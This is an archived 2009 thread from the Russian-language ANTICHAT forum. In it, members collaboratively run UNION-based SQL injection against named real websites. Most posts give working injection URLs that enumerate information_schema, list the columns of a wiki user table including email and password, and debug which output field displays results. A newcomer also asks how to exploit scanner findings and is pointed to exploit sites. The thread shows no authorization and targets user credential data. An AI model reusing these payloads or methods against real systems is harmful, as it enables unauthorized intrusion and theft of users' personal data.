ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.08.2009, 02:22
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
В той таблице нету записей
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,(select+c ount(*)+from+dubwiki_user),13+from+information_sch ema.tables--+
|
|
|
18.08.2009, 02:22
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
crawen_s
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,column_name,11, 12,13+from+information_schema.columns+where+table_ name=0x64756277696B695F75736572+limit+1,7/*
id
name
email
password
homepage
creationts
А вообще:
Может быть другая DB. Как проверять написал Pashkela
В данной таблице нету записей
...WHERE TABLE_NAME=<hex>
Последний раз редактировалось Tigger; 18.08.2009 в 02:25..
|
|
|
|
18.08.2009, 02:30
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
...
))) не в то поле смотрел  )) Пора баиньки
Вообще бред какой-то:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_user--+
вот так должен выводить ноль, если записей нет, ошибки нет, но просто пусто, великолепно. Хз чо такое
А вот с этой таблы выводит:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,count(*),11,12,13+from+dubwiki_version--+
и показывает кол-во 7. У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото.
Старшие придут, может чо поумнее скажут
PS: Ну да, остальные dubwiki в той же БД:
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,table_schema,11,12,13+from+information_schema.columns+where+table_name=0x64756277696b695f70616765--+
но из них инфо спокойно читается, на тоже как-то странно )
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+
какой-то мегохоцер БД строил
Последний раз редактировалось Pashkela; 18.08.2009 в 02:55..
|
|
|
|
18.08.2009, 04:06
|
|
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055
Репутация:
347
|
|
Сообщение от Pashkela
... У меня вывод только один - покрашенная табла в БД, а именно dubwiki_user, т.е. сломанная, нарушенны какие-то связи и т.д. Других вариантов не вижу чото.
Старшие придут, может чо поумнее скажут
..
а вы как бы не предполагали что вы не туда выводите результат запроса? Просто в коде для 10-ого поля стоит проверка, если 0 то ничего не выводится вообще. А если выводить например в 12-ое поле то отлично видно что в той табличке просто ничего нет
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,10,11,count(*),13+from+dubwiki_user--+
|
|
|
|
18.08.2009, 05:50
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
^
||
Вот именно
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,0x30,11,12,13+--+
какие тут связи нарушены могут быть? нейронные? во что покрашена табла? в какой цвет? и собственно какая табла? в последнем примере ничего странного не обнаружил, мож ты просто в concat_ws разделитель забыл поставить?
__________________
Карфаген должен быть разрушен...
|
|
|
|
18.08.2009, 09:00
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.alcodream.ru/categoryID/80+UNION+SELECT%20group_concat(table_name)%20from% 20information_schema.tables%20--
Как вот сдесь сделать вывод просто если 80 заменить на 80-80 или там на 2923939 или "-" подставить скиыдывает на индекс.пхп
|
|
|
|
18.08.2009, 13:02
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Pashkela
...
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+
какой-то мегохоцер БД строил Какой то мегохоцер не умеет юзать concat_ws
|
|
|
|
18.08.2009, 13:13
|
|
Новичок
Регистрация: 29.04.2009
Сообщений: 4
Провел на форуме:
8590
Репутация:
4
|
|
Наибанальнейший вопрос:
Допустим у меня есть сканер уязвимостей, он находит N колличество уязвимостей, а как мне их испольховать?
Если уже где-то это было прошу скинуть ссылку на этот топик.
|
|
|
|
18.08.2009, 13:18
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Сообщение от Pashkela
Код:
http://www.subco.org/sc.php?src=entry&id=-187+union+select+1,2,3,4,5,6,7,8,9,concat_ws(id,name,currentversion),11,12,13+from+dubwiki_page+limit+1,1--+
какой-то мегохоцер БД строил concat_ws(0x3a,column,column) мегохоцер 
|
|
|
|
18.08.2009, 13:19
|
|
Новичок
Регистрация: 19.07.2009
Сообщений: 17
Провел на форуме:
134119
Репутация:
2
|
|
6@llT0
Копируеш тип уязвимости и в гугл искать сплоит или хотяби тему на форуме www.sevuritylab.ru, www.securityfocus.com, etc.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
